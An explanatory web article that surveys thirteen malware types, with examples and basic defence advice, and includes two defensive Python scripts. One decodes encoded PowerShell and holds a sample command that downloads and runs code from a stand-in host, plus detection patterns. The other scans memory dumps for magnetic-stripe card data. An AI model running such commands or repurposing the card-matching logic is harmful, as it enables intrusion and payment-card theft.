Malware (short for malicious software) is any program written with the intent of doing harm to devices and data. It is created with an objective in mind. While that objective is limited only by the imagination of its creator, most malicious programs are written to steal data, credentials, and payment information.
Malware attacks can occur on all kinds of devices and operating systems, including iPhones, Android phones, MacBooks, Windows PCs, and even Linux.
According to SonicWall Capture Labs, more than 5 billion malware attacks are carried out every year. About 92% of them are delivered via email. Over the past few years, the volume of mobile malware and macOS malware has increased drastically.
Today, more than 18 million websites are infected with malicious code at any given time each week, 34% of businesses are hit with malware, and 80% of financial institutions are targeted by malware every year.
With the advent of machine learning and targeted spear-phishing emails, malware attacks have become even more sophisticated and difficult to identify.
Therefore, it is important to recognize all sorts of malicious software that could affect your personal or business data. Below, we have listed several different types of malware that are used broadly against corporate and government websites to gather sensitive information and disrupt their operations. Each behaves in a particular way and has its own characteristics.
13. Worm
Hex dump of the Blaster worm
Example: Conficker (affected home and office Windows computers in over 190 countries)
A worm can propagate or self-replicate from one device to another without any human intervention. This type of malware doesn’t even need to attach itself to an application in order to cause damage.
It could either arrive as attachments in instant messages or spam emails, or could be transmitted via software vulnerabilities. Once installed on the machine, it silently works in the background without users’ knowledge.
It can modify/delete existing files or inject malicious code into the operating system. This makes it easier for attackers to install a backdoor, steal data, and gain control over a device and its system settings.
Some worms are designed with the sole purpose of exhausting system resources. They can make millions of copies of themselves over and over, depleting storage space or bandwidth by overloading a shared network.
Since worms do not require a host program, they are more infectious than usual computer viruses. Not only do they infect local machines, but also servers and clients on the network.
One of the best-known examples of a computer worm is ILOVEYOU. Also called Love Bug, it infected more than 50 million Windows PCs in 2000. It spread like wildfire because of its ability to read the email addresses in a user’s Outlook contact list and send a copy of itself to all of them.
12. Keylogger
Example: Backdoor.Coreflood (records every keystroke and sends this data to attackers)
A keylogger can be a software program or a hardware device designed to secretly monitor and log all keystrokes. It creates a record of everything you type on a computer or smartphone. Every record is stored in a file to be retrieved at a later time.
While most keyloggers record data such as the length and velocity of each keypress, some record everything on the user’s copy-cut-paste clipboard, GPS data, calls, and microphone and camera footage.
In most cases, keyloggers are used for legitimate purposes like feedback for software development and studying keystroke dynamics or human-computer interaction. However, when used for harmful purposes, keyloggers can serve as malicious software.
Attackers can install keyloggers on your device (without your knowledge) to steal sensitive information, passwords, and financial information. Whether for malicious intent or for legitimate uses, you must be aware of the data keyloggers are capturing from your device.
11. Rootkit
Example: Stuxnet (reportedly ruined 1/5th of Iran’s nuclear centrifuges, infected 200,000 industrial computers, and caused 1,000 machines to physically degrade)
A rootkit is a set of malicious tools that gives unauthorized access to a piece of software or to the whole operating system. It is designed to remain hidden on a target machine. While you might not notice a rootkit, it remains active in the background, giving attackers the ability to remotely control your device.
Rootkits can contain many different programs, ranging from scripts that make it easy for attackers to steal your passwords and banking information to modules that allow them to disable your security software and track everything you type on your computer.
Since rootkits can disable the security software installed on your machine, they are very hard to detect. They can live on your device for weeks or even months, causing substantial damage.
They can be detected by using an alternative reliable operating system, difference scanning, signature scanning, memory dump analysis, and behavioral-based methods.
Removal can be difficult or almost impossible, especially when the rootkit hides in the kernel. In such cases, the only way to completely eliminate the rootkit is to erase everything and install a new operating system. The situation gets even worse when you are dealing with firmware rootkits — you may need to replace certain parts of the hardware.
10. Fileless Malware
Example: WannaMine (mines cryptocurrency on the host device)
Fileless malware emerged in 2017 as a mainstream type of attack. It abuses programs built into Microsoft Windows to carry out attacks. More specifically, it leverages PowerShell, a task automation and configuration management program developed by Microsoft, to execute its payload.
This type of malware is not stored or installed directly on a device. Instead, it goes straight into memory (RAM), and the malicious code never touches secondary storage (SSD or HDD).
As the name suggests, it does not rely on files and leaves no footprint on disk. This makes fileless malware very difficult to identify and delete: without an executable file, there is no signature or pattern for antivirus tools to detect.
Fileless malware has proven effective at evading anti-forensic controls such as signature detection, pattern analysis, time-stamping, file-based whitelisting, and hardware verification, though it can still be detected by modern, sophisticated security solutions.
And since it is designed to work in RAM only, it survives only until the system is rebooted.
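As an added illustration of how defenders surface the PowerShell abuse described above (example code written for this page, not from any tool or vendor it mentions): the script decodes the base64/UTF-16LE payload that PowerShell's -EncodedCommand flag accepts and checks it against an assumed watch-list of indicators. The command lines are constructed samples, not real telemetry.

```python
import base64
import re
from typing import List, Optional

# Assumed defender watch-list for decoded PowerShell (constructed for this example)
INDICATORS = {
    "Invoke-Expression": r"\b(?:Invoke-Expression|IEX)\b",
    "DownloadString": r"\.DownloadString\(",
    "FromBase64String": r"FromBase64String\(",
    "Hidden window": r"-W(?:indowStyle)?\s+Hidden",
    "Bypass execution policy": r"-E(?:xecutionPolicy)?\s+Bypass",
}

# -EncodedCommand and its short forms, followed by the base64 token
ENC_FLAG = re.compile(r"-(?:EncodedCommand|enc|ec|e)\s+([A-Za-z0-9+/=]+)", re.IGNORECASE)


def decode_encoded_command(cmdline: str) -> Optional[str]:
    """Return the script hidden behind -EncodedCommand, or None if there is none.
    PowerShell expects base64 of the UTF-16LE encoding of the script."""
    m = ENC_FLAG.search(cmdline)
    if not m:
        return None
    try:
        return base64.b64decode(m.group(1), validate=True).decode("utf-16-le")
    except (ValueError, UnicodeDecodeError):
        return None  # not a real encoded command (e.g. truncated by the logger)


def fileless_indicators(cmdline: str) -> List[str]:
    """Watch-list entries present in the command line or in its decoded payload."""
    blob_free = ENC_FLAG.sub("", cmdline)  # drop the base64 token so it cannot cause false matches
    decoded = decode_encoded_command(cmdline) or ""
    text = blob_free + "\n" + decoded
    return [name for name, pat in INDICATORS.items() if re.search(pat, text, re.IGNORECASE)]


def encode_command(script: str) -> str:
    """Build the form PowerShell expects; used here only to construct sample input."""
    return base64.b64encode(script.encode("utf-16-le")).decode("ascii")


# Constructed sample command lines, not real telemetry
BENIGN_SCRIPT = "Get-Date | Out-File C:\\Temp\\stamp.txt"
SUSPICIOUS_SCRIPT = ("Invoke-Expression (New-Object Net.WebClient)"
                     ".DownloadString('http://example.invalid/stage')")
BENIGN_CMDLINE = "powershell.exe -NoProfile -EncodedCommand " + encode_command(BENIGN_SCRIPT)
SUSPICIOUS_CMDLINE = ("powershell.exe -NoP -W Hidden -ExecutionPolicy Bypass -enc "
                      + encode_command(SUSPICIOUS_SCRIPT))

if __name__ == "__main__":
    for line in (BENIGN_CMDLINE, SUSPICIOUS_CMDLINE):
        print("decoded:   ", decode_encoded_command(line))
        print("indicators:", fileless_indicators(line))
```

Because the payload is decoded rather than pattern-matched as a base64 blob, re-encoding the same script does not evade the check.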
9. Adware
Example: Appearch (inserts so many ads into the browser that surfing becomes next to impossible)
Adware, also known as advertising-supported software, displays ads on a computer and smartphone screen, redirects search results to advertising sites, and tracks users’ data for marketing purposes.
The primary objective of adware is to generate revenue by serving ads to users when they are installing an application or surfing the web.
Sometimes, the term adware is used to describe a malicious tool that presents annoying ads to the user. These ads come in various forms, such as a pop-up, a banner, a static box, a window that cannot be closed, or a video with sound.
Although they are not dangerous or harmful, they can make your computer ridiculously slow. Too many ads on a single webpage can make your browser unresponsive, especially if you are using an old device.
Besides slowing down your system, some adware tools are designed to collect users’ data and their behavior. They can track browsing history, search queries, time spent on a particular website, purchases, IP addresses, and device information.
8. Malicious Bots
Example: Srizbi (as of 2008, it was the largest botnet, responsible for sending out more spam than all other major botnets combined)
Internet bots, also known as web robots, are designed to run automated tasks (scripts) over the internet. They can efficiently perform simple and repetitive tasks—for example, collecting data from billions of web pages. The advent of machine learning techniques has led to the development of more sophisticated bots that can imitate human behavior.
However, attackers realized the potential of bots a long time ago and started using them for harmful purposes. Today, a significant portion of all bots are used to steal users’ data and passwords.
Malware bots can infect a large number of devices. Such a large network of devices infected by bots is called a botnet. Botnets can be used to carry out DDoS attacks, send spam, and steal data. They can even allow attackers to access the device and its connections and overwhelm servers until they crash.
Since botnets don’t have a large footprint, users might never realize their devices are being used as a part of the botnet to relay spam. However, the device might start showing some symptoms such as sluggish performance, frequent crashes without an identifiable reason, and slow internet access.
7. Crimeware
Example: Targeted attacks sent via SMTP
Crimeware is any computer program that automates cybercrime and makes it easier to perform illegal activities online. These programs are meant to automate the theft of data, helping attackers gain access to people’s financial accounts online.
Attackers employ various techniques to steal confidential data through crimeware. For example, they can use scripts to redirect a user’s web browser to a counterfeit website, steal passwords cached on a system, enable remote access into apps, encrypt all data on a device, or secretly install keystroke loggers.
Cybercrime has also taken some pointers from the cloud computing industry and has begun developing “as-a-service” offerings as well.
Crimeware-as-a-Service allows specialization in specific areas. This means no one has to know how to do everything, and the entire process can be carried out more efficiently.
For example, rather than one attacker running the entire malicious operation, roles may be spread over multiple attackers doing different jobs and splitting the profits. A cybercriminal team may include a developer writing a malicious script, another creating mailing lists, a third attacker handling customer service (for ransomware), and a fourth transforming valuable data or currency into untraceable profit.
6. RAM Scraper
Example: BlackPOS (stole the personal information of 96 million customers in 2013)
A RAM scraper is a malicious program that scans the primary memory of infected devices to steal confidential data. Since it targets the terminal used to process retail transactions, it is also called a point-of-sale (POS) attack.
The payment card industry uses a set of data security standards (known as PCI-DSS) that require end-to-end encryption of sensitive information. The sensitive payment data is decrypted in the POS terminal’s RAM for processing, and this is where the RAM scraper strikes. It uses regular-expression searches to collect the plain-text payment data, which is then sent to rogue call-home servers.
The first RAM scraping attack was reported in 2008 by the American multinational financial services corporation Visa Inc.
Only cards with magnetic stripes are vulnerable to this type of malware. The magnetic stripe contains three data tracks: Track 1, Track 2, and Track 3. A RAM scraper uses regular-expression matches to pull Track 1 and Track 2 card data out of the primary memory of the POS terminal. A few scrapers use the Luhn algorithm to check card validity before exfiltration.
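The regex-plus-Luhn matching described above, turned into a defender's check (an added example for this page, not code from any product named here): it scans a constructed memory-dump buffer for ISO/IEC 7813 Track 1 and Track 2 records, keeps only Luhn-valid PANs, and reports them masked, so a POS team can confirm that cleartext card data is not lingering in memory or logs.

```python
import re
from typing import Dict, List

# ISO/IEC 7813 magnetic-stripe layouts the page refers to:
#   Track 1 (format B): %B<PAN>^<NAME>^<YYMM><service code><discretionary data>?
#   Track 2:            ;<PAN>=<YYMM><service code><discretionary data>?
TRACK1 = re.compile(r"%B(\d{13,19})\^([^^]{2,26})\^(\d{4})(\d{3})([^?]*)\?")
TRACK2 = re.compile(r";(\d{13,19})=(\d{4})(\d{3})(\d*)\?")


def luhn_valid(pan: str) -> bool:
    """Luhn check: double every second digit from the right; the sum must be a multiple of 10."""
    total = 0
    for i, ch in enumerate(reversed(pan)):
        d = int(ch)
        if i % 2 == 1:
            d = d * 2 - 9 if d > 4 else d * 2
        total += d
    return total % 10 == 0


def mask(pan: str) -> str:
    """Keep only the first six and last four digits, the usual PCI-DSS display form."""
    return pan[:6] + "*" * (len(pan) - 10) + pan[-4:]


def find_card_data(buffer: bytes) -> List[Dict[str, object]]:
    """Report every Luhn-valid track record in a memory or log buffer, PANs masked."""
    text = buffer.decode("latin-1")  # one char per byte, so offsets match the raw dump
    hits = []
    for track, rx in ((1, TRACK1), (2, TRACK2)):
        for m in rx.finditer(text):
            pan = m.group(1)
            if not luhn_valid(pan):
                continue  # random digit runs fail Luhn; a scraper filters them the same way
            expiry = m.group(3) if track == 1 else m.group(2)
            hits.append({"track": track, "offset": m.start(), "pan": mask(pan), "expiry": expiry})
    return sorted(hits, key=lambda h: h["offset"])


# Constructed dump fragment using well-known test PANs; not data from a real terminal
SAMPLE_DUMP = (
    b"\x00\x00txn ok\x00"
    b"%B4111111111111111^DOE/JANE^25121011234567890?"
    b"\x00\x17;4242424242424242=25121011234567890?\x00"
    b";4111111111111112=2512101?"  # fails the Luhn check, so it is ignored
    b"\x00end"
)

if __name__ == "__main__":
    for hit in find_card_data(SAMPLE_DUMP):
        print(hit)
```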
5. Backdoor
Example: Titanium (includes a complex sequence of dropping, downloading, and installing stages, with the deployment of a Trojan backdoor at the final phase)
A backdoor is a covert technique of bypassing conventional authentication or encryption procedures in a computer or embedded device. As a result, access is granted to the system or application, such as databases or file servers, giving cybercriminals the ability to remotely control the system and update malware.
Typically, backdoor installation is achieved by leveraging vulnerable modules in an application. For instance, outdated plugins and default passwords can operate as backdoors if they are not updated/changed by the user for a very long time.
Small firms are particularly vulnerable to backdoor attacks because they lack the financial resources to safeguard their computers or to identify successful attacks. That is why more than 40% of cyberattacks are aimed at small businesses.
Unlike other malware such as RAM scrapers, backdoors aren’t going away anytime soon. According to the Malwarebytes Labs report, backdoors are among the five most common threat detections for both consumers and businesses.
4. Ransomware
WannaCry ransom note on an infected system (2017)
Example: WannaCry (targeted Windows PC by encrypting files and demanding $300-$600 ransom payments via Bitcoin)
Ransomware encrypts the victim’s personal data or blocks access to it. Depending on the type of ransomware, either individual files or the entire operating system is encrypted.
The attacker then demands a ransom from the victim, promising to restore access upon payment. This demand usually comes with a deadline. If the victim doesn’t pay before the deadline, their data is deleted forever or the ransom increases.
Attackers give the victim instructions explaining how to pay the fee to get the decryption key. The cost ranges from a few hundred dollars to millions. They demand ransoms in Bitcoin and other cryptocurrencies, which makes tracing and prosecuting the perpetrators difficult.
A new global research report shows that 35% of businesses pay ransom between $350,000 and $1.4 million, while 7% pay ransoms over $1.4 million.
In most cases, attackers target universities and small businesses because they seem more likely to pay a ransom quickly. They also target medical facilities, law firms, and government agencies that may be willing to pay to regain immediate access to their files or keep news of a compromise quiet.
3. Spyware
Example: DarkHotel (selectively attacks high-profile visitors through hotel WiFi networks)
Spyware installs itself on your device and starts covertly tracking your online behavior without your knowledge or permission.
It’s a kind of malware that secretly gathers data about a user or a business and sends that data to other parties such as marketing and advertising firms. Usually, it is installed without user consent by methods like a deceptive pop-up window, a drive-by download, or malicious code injected (hidden) into legitimate software.
Once installed, spyware can monitor your internet activity, track login credentials, and spy on personal information. Its primary goal is to steal credit card numbers, user names, passwords, and banking information.
This type of malware can be difficult to detect. The infected device shows a noticeable reduction in connection speeds, responsiveness, and battery life.
One of the most notorious examples of spyware is Pegasus. It is capable of tracking calls, reading text messages, tracking location, accessing the target device’s camera and microphone, and collecting passwords and data from apps. What makes this spyware so dangerous is that it can be installed on smartphones (running Android or iOS) through a zero-click exploit.
2. Trojan
Example: Wirenet (a password-stealing Trojan that targets macOS, Linux, Windows, and Solaris users)
Trojans pretend to be something useful while actually causing harm to your computer. They can hide in unexpected places like downloads and emails.
A Trojan seeks to deceive users into loading and executing a malicious program on their devices. Once installed, it can disrupt, steal, or inflict some other harmful actions on users’ data and network.
Unlike viruses, Trojans cannot replicate themselves. So this type of malware requires users to download and install a server-side application for it to work. Once the system is infected, it can spread the malware to other devices.
The infected machine can be remotely controlled by attackers without the owner’s knowledge. Attackers can then turn it into a zombie computer to continue sharing malicious code across devices on a network.
Depending on the type of Trojan and its purpose, the malware may self-destruct, return to being dormant, or remain active on the computer.
Zeus Trojan, for example, is designed to steal users’ data and banking information. It targets Microsoft Windows users. It was first identified in 2007 when it targeted the US Department of Transportation. It became more widespread in 2009, infecting more than 74,000 FTP accounts of numerous popular websites, including Amazon, NASA, Cisco, and Bank of America.
1. Computer Virus
Example: Brain (first computer virus for the IBM PC and compatibles)
A computer virus is malicious code that copies itself into another application, document, or a device’s boot sector, changing the way the device works. It requires some sort of human intervention to spread between systems.
The first computer virus was developed in 1971 with the sole purpose of testing whether a software program could replicate itself. However, soon it was found that attackers were utilizing self-replicating programs to steal information or deplete system resources.
A virus contains three major components:
- Infection vector: determines how the virus propagates from one system to another
- Logic bomb: the part of the virus that activates as soon as specified conditions are met (for example, when a user opens a file)
- Payload: the component of the attack that causes harm to the target system
Most viruses come from internet file download, email, text message attachments, and social media scam links. Once you download or install the malicious program, the virus can infect other devices on the same network.
It can corrupt files, spam your email contacts, log keystrokes, steal passwords, and even take over your computer. While some viruses are written to disrupt the system’s performance or cause permanent damage to operating systems, some replicate themselves to flood the network with traffic, making the service unreachable.
Frequently Asked Questions
What can malicious code do?
Depending on the purpose of malware, it can degrade the device performance, crash applications randomly, add new programs into your system, delete existing applications, send spam, and steal your sensitive information and passwords.
In a nutshell, a malicious script has the ability to not only steal your private information but also destroy your assets and business as a whole in the process.
What type of software protects against malware?
Modern antivirus software and malware removal tools have been proven effective against many different types of malicious programs. They thoroughly scan devices to detect harmful scripts and provide automatic updates for enhanced protection against newly developed malware.
Some tools have adopted machine learning techniques to effectively spot and classify malware while minimizing the number of false positives.
What are the most effective ways to defend against malware?
To prevent your machines from being infected with harmful scripts, you should:
- Install antivirus software and a firewall
- Regularly update your operating system and applications
- Download and install apps only from trusted sources
- Never open suspicious files attached to emails
- Back up data regularly
In order to keep your device running smoothly, you can also take some additional steps, such as keeping files and folders uncluttered, emptying the recycle bin, and running Disk Defragmenter and Disk Cleanup in Windows.